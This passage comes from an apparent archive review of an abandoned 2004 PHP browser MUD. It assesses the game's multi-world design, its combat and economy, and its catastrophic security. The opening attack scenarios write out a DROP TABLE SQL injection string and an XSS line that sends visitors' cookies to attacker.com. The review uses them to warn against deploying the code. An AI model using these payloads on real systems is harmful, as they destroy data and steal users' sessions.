Result: Invincible character, one-shot everyone

Scenario 3: Database Wipe (2 minutes)

```sql
-- In any input field:
'; DROP TABLE players; DROP TABLE battle; --
```

Result: Entire game database destroyed

Scenario 4: Session Hijacking (1 minute)

// In profile:



document.location='http://attacker.com/steal?cookie='+document.cookie;


Result: Steal all player sessions viewing profile

Risk Level: CATASTROPHIC

Impact Assessment:

  • Confidentiality: Total breach (all passwords visible/crackable)
  • Integrity: Total compromise (any data modifiable)
  • Availability: Easy destruction (DROP TABLE attacks)
  • Community: Trust destroyed if breached
  • Legal: Likely violates data protection laws

DO NOT DEPLOY THIS CODE TO ANY INTERNET-ACCESSIBLE SERVER

The 139 players who played this game had their passwords, emails, and IPs completely exposed. If the server was ever compromised (likely), all player data was stolen.

Innovation & Uniqueness Rating

Innovation Score: 6/10 (for 2004)

Innovative Elements:

Multi-World Architecture - Genuinely Creative

  • File-based world variants (.001, .002, .003)
  • Each world can override any page
  • Allows parallel game instances with different rules
  • Load balancing potential
  • Content variety without code duplication
  • For 2004, this was forward-thinking

Asynchronous Turn-Based Combat - Clever Solution

  • Players don't need to be online simultaneously
  • Persistent battle state
  • lastmove field determines whose turn
  • Works perfectly for web-based gameplay
  • Better than real-time for slow-paced MUDs

Status Effects Framework - Forward-looking

  • Time-based duration system
  • Extensible design
  • Ready for buffs/debuffs
  • More advanced than typical 2004 MUDs

Two-Currency Economy - Depth

  • Credits (common) and Platinum (rare)
  • Prevents inflation
  • Monetization potential
  • More sophisticated than single currency

Standard Elements:

  • Turn-based combat (common)
  • Level/experience system (universal)
  • Chat/mail/forums (required)
  • Stats and abilities (expected)
  • PvP focus (typical MUD)

Uniqueness Score: 4/10

TCW is one of thousands of browser MUDs from 2003-2006. The multi-world system is its main distinguishing feature. Otherwise, it's a standard text-based RPG with unfinished race/class systems.

Historical Significance:

Represents the hobby MUD developer era (2000-2006) where individuals built and hosted their own games:

  • Source code freely shared
  • Small communities (139 players typical)
  • Unfinished features common
  • Team collaboration (writers, designers)
  • Hosted on personal servers (kawanda.net:1155)

The market died with:

  • Flash games (richer graphics)
  • Social games (FarmVille era)
  • Mobile games (2008+)
  • MMORPGs (WoW dominance)

TCW represents pure hobby game development - built for fun, not profit.

Comparison to Contemporary Games

vs. Kingdom of Loathing (2003):

  • KoL had humor and polish
  • TCW more traditional MUD
  • KoL survived to today
  • TCW died circa 2006

vs. Urban Dead (2005):

  • Urban Dead had unique setting (zombies)
  • TCW generic fantasy/sci-fi
  • Urban Dead had better community features
  • Both used simple text-based interface

vs. Other Browser MUDs (hundreds existed):

  • TCW's multi-world system unique
  • Otherwise very similar to competition
  • Most died 2006-2008
  • Few survivors (KoL, Torn City)

Market Position: Lower-tier hobby project. Small community, unfinished features, but functional core. Typical of the era.

Final Recommendation

For Developers

  • DO study the multi-world architecture (genuinely innovative)
  • DO examine the asynchronous combat system (clever)
  • DO reference the status effects framework
  • DON'T attempt to modernize (70% incomplete)
  • DON'T use as PHP learning resource (dangerous practices)
  • DON'T run on any network

For Server Administrators

  • NEVER deploy this code
  • NEVER expose to internet
  • ONLY examine in isolated VM
  • USE as security anti-pattern example
  • SHARE as cautionary tale

For Historians

  • Perfect example of hobby MUD development (2000-2006)
  • Shows team collaboration on open source
  • Evidence of real community (10K logs)
  • Typical of the era (unfinished, insecure, functional)
  • Part of "build your own MUD" movement

For Players

  • DON'T play any live instance
  • Your password will be compromised
  • Your IP will be logged
  • Server likely already hacked
  • Look for modern alternatives: Kingdom of Loathing, Torn City

Bottom Line:

Tsunami Channel Wars was an ambitious hobby project with innovative ideas (especially the multi-world architecture). The asynchronous turn-based combat system is clever, and the evidence of real community (139 players, 10,579 log entries) proves the core gameplay worked.

Strengths:

  • Multi-world architecture (genuinely innovative)
  • Asynchronous turn-based combat (clever solution)
  • Real community (139 players, 10K logs)
  • Two-currency economy
  • Status effects framework
  • Team collaboration

Fatal Flaws:

  • 70% feature incomplete (race/class/items/skills unfinished)
  • Catastrophic security (SQL injection everywhere)
  • No password hashing (MD5 at best)
  • register_globals dependencies
  • XSS throughout
  • Ancient PHP/MySQL

Modern Value: Low except as:

  • Multi-world architecture study
  • Asynchronous combat pattern
  • Hobby MUD history
  • Security anti-pattern example
  • Game design reference

If building a browser MUD today:

  • Study the multi-world concept
  • Implement asynchronous combat system
  • Use Laravel + Vue.js + WebSockets
  • Build in 250-350 hours vs trying to fix this
  • Prioritize security from day one

Bottom Line

This represents the golden age of hobby MUD development - passionate individuals building games for small communities, sharing source code freely, working in teams despite geographic distance. The code is dangerous and incomplete, but the spirit of community game development is admirable.

Rating Summary

Historical Value ★★★☆☆ 3/5 - Represents hobby MUD era well
Code Quality ★★☆☆☆ 2/5 - Functional core, catastrophic security
Game Design ★★★☆☆ 3/5 - Multi-world system innovative, 70% incomplete
Innovation ★★★★☆ 4/5 - Multi-world & async combat forward-thinking
Security ☆☆☆☆☆ 0/5 - Catastrophic vulnerabilities everywhere
Community Evidence ★★★★★ 5/5 - 139 players, 10,579 log entries!
Overall Grade D+ Innovative ideas, dangerous implementation, incomplete

Security Warning

Running many of the scripts in this archive on a live server presents a serious security risk. These projects were created before modern hardening practices and may contain vulnerabilities that can compromise your system.

We strongly recommend using this code for reference and analysis only, or in isolated local environments. By downloading these files, you accept full responsibility for their use.